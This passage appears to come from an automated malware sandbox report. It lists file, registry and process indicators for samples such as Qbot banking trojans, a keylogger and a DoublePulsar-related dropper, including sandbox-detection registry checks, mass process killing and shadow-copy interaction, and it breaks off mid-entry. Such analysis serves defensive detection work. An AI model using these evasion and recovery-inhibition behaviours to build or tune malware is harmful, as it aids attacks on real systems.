C:\Windows\Fonts\Mysql\181.215.4.205.c puls.exe File opened for modification C:\Windows\Fonts\Mysql\A.txt mance.exe File created C:\Windows\Fonts\Mysql\181.215.45.150.c puls.exe File opened for modification C:\Windows\Fonts\Mysql\A.txt File opened for modification C:\Windows\Fonts\Mysql\A.txt File opened for modification C:\Windows\Fonts\Mysql\C.txt File opened for modification C:\Windows\Fonts\Mysql\E.txt File opened for modification C:\Windows\Fonts\Mysql\G.txt mance.exe File opened for modification C:\Windows\Fonts\Mysql\I.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\C.txt File opened for modification C:\Windows\Installer\{C23BCE3A-FD25-48BA-948E-2CE94576F983}\protonvpn.exe msiexec.exe File opened for modification C:\Windows\Fonts\Mysql\A.txt File opened for modification C:\Windows\Fonts\Mysql\B.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\E.txt Eter.exe File opened for modification C:\Windows\Fonts\Mysql\E.txt Eter.exe File opened for modification C:\Windows\Fonts\Mysql\F.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\I.txt puls.exe File created C:\Windows\Fonts\Mysql\181.215.45.86.c puls.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Installer\MSI605A.tmp msiexec.exe File opened for modification C:\Windows\Fonts\Mysql\B.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\C.txt File opened for modification C:\Windows\Fonts\Mysql\I.txt File created C:\Windows\Fonts\Mysql\181.215.15.153.c puls.exe File opened for modification C:\Windows\Fonts\Mysql\H.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\H.txt File opened for modification C:\Windows\Fonts\Mysql\I.txt File opened for modification C:\Windows\Fonts\Mysql\C.txt File created C:\Windows\Fonts\Mysql\Doublepulsar.dll Trojan.Win32.Reconyc.jmjd-044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763.exe File opened for modification C:\Windows\Fonts\Mysql\E.txt Eter.exe -
Launches sc.exe 19 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2032 sc.exe 3984 sc.exe 2272 sc.exe 1788 sc.exe 3356 sc.exe 2680 sc.exe 2332 sc.exe 2648 sc.exe 4236 sc.exe 1956 sc.exe 1956 sc.exe 1692 sc.exe 2716 sc.exe 1692 sc.exe 3972 sc.exe 2336 sc.exe 4220 sc.exe 1208 sc.exe 3428 sc.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4712 4832 WerFault.exe HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
net1.exetaskkill.execmd.execmd.exepuls.exeEter.exeTrojan-Spy.Win32.KeyLogger.brcj-85267066f82927ee6ed25de08fbd0a697ece1331542db9158d7baf69fa874655.exepuls.execmd.exeEter.exepuls.execmd.exepuls.exepuls.exepuls.exetaskkill.exeWMIC.exepuls.exepuls.execmd.execmd.exepuls.exepuls.exemance.execacls.exeRegAsm.exeHEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exeRegAsm.exepuls.exepuls.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.execmd.execmd.exepuls.exemance.execacls.exepuls.exepuls.exepuls.exepuls.exesc.exepuls.exeEter.exetaskkill.exetaskkill.exemance.exepuls.exeEter.exenet1.exetaskkill.exeattrib.exemance.exemance.exepuls.execsrss.exeEter.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Eter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Spy.Win32.KeyLogger.brcj-85267066f82927ee6ed25de08fbd0a697ece1331542db9158d7baf69fa874655.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Eter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mance.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mance.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Eter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mance.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Eter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mance.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mance.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language puls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Eter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 16 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEcmd.exePING.EXEcmd.exePING.EXEPING.EXEPING.EXEpid process 2148 PING.EXE 11888 PING.EXE 6724 1156 PING.EXE 2100 PING.EXE 4912 PING.EXE 10992 PING.EXE 4004 PING.EXE 2336 cmd.exe 6140 PING.EXE 6644 cmd.exe 5292 5688 PING.EXE 8176 PING.EXE 7076 PING.EXE 10320 -
System Time Discovery 1 TTPs 64 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
Processes:
mance.exemance.exeEter.exemance.exepuls.exemance.exeEter.exeEter.exepuls.exeEter.exemance.exemance.exepuls.exepuls.exemance.exemance.exemance.exemance.exepuls.exeEter.exemance.exeEter.exemance.exemance.exemance.exemance.exemance.exemance.exeEter.exepuls.exemance.exemance.exemance.exemance.exepuls.exepuls.exemance.exemance.exeEter.exepid process 5424 9956 mance.exe 9468 mance.exe 6428 2088 8480 5160 Eter.exe 7780 mance.exe 10716 puls.exe 9064 9688 mance.exe 5708 11912 1956 Eter.exe 6656 Eter.exe 10248 puls.exe 10704 7720 296 7412 Eter.exe 2404 mance.exe 8628 mance.exe 5156 6708 11108 6776 puls.exe 4808 puls.exe 7712 mance.exe 2228 9344 mance.exe 11532 12056 mance.exe 6012 mance.exe 5152 puls.exe 5232 Eter.exe 2244 10528 11744 1288 mance.exe 2404 Eter.exe 9340 mance.exe 10144 mance.exe 7148 mance.exe 8736 mance.exe 5392 mance.exe 5356 5224 mance.exe 11268 Eter.exe 7124 2020 6392 puls.exe 12012 mance.exe 8744 mance.exe 9852 mance.exe 8780 mance.exe 9580 6788 8108 4312 puls.exe 7688 puls.exe 304 mance.exe 9424 mance.exe 8408 7940 Eter.exe -
Checks SCSI registry key(s) 3 TTPs 14 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exeTrojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exetaskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000004c79797f2efc73ee0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800004c79797f0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809004c79797f000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d4c79797f000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004c79797f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exefirefox.exefirefox.exedw20.exefirefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 dw20.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Enumerates system info in registry 2 TTPs 13 IoCs
Processes:
dw20.exemsedge.exechrome.exedw20.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.EXEpid process 6904 vssadmin.EXE -
Kills process with WMI 15 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 1952 WMIC.exe 2804 WMIC.exe 5388 WMIC.exe 6136 WMIC.exe 2336 WMIC.exe 5700 WMIC.exe 3824 WMIC.exe 6004 WMIC.exe 560 WMIC.exe 5676 WMIC.exe 6104 WMIC.exe 4396 WMIC.exe 5916 WMIC.exe 6136 WMIC.exe 4112 WMIC.exe -
Kills process with taskkill 59 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2912 taskkill.exe 772 taskkill.exe 4880 taskkill.exe 3668 taskkill.exe 2924 taskkill.exe 568 taskkill.exe 404 taskkill.exe 5108 taskkill.exe 4992 taskkill.exe 2168 taskkill.exe 3936 taskkill.exe 3632 taskkill.exe 2204 taskkill.exe 2880 taskkill.exe 2456 taskkill.exe 2412 taskkill.exe 576 taskkill.exe 6140 taskkill.exe 560 taskkill.exe 2176 taskkill.exe 2792 taskkill.exe 2264 taskkill.exe 912 taskkill.exe 3064 taskkill.exe 1976 taskkill.exe 4396 taskkill.exe 4620 taskkill.exe 3664 taskkill.exe 3496 taskkill.exe 4696 taskkill.exe 1964 taskkill.exe 4372 taskkill.exe 1492 taskkill.exe 2044 taskkill.exe 1576 taskkill.exe 3516 taskkill.exe 3632 taskkill.exe 1964 taskkill.exe 3100 taskkill.exe 2852 taskkill.exe 1340 taskkill.exe 1472 taskkill.exe 4796 taskkill.exe 560 taskkill.exe 2648 taskkill.exe 568 taskkill.exe 4076 taskkill.exe 3872 taskkill.exe 1692 taskkill.exe 4072 taskkill.exe 4932 taskkill.exe 4416 taskkill.exe 4832 taskkill.exe 3456 taskkill.exe 1136 taskkill.exe 4768 taskkill.exe 2032 taskkill.exe 2360 taskkill.exe 5740 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exemsiexec.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" csrss.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight 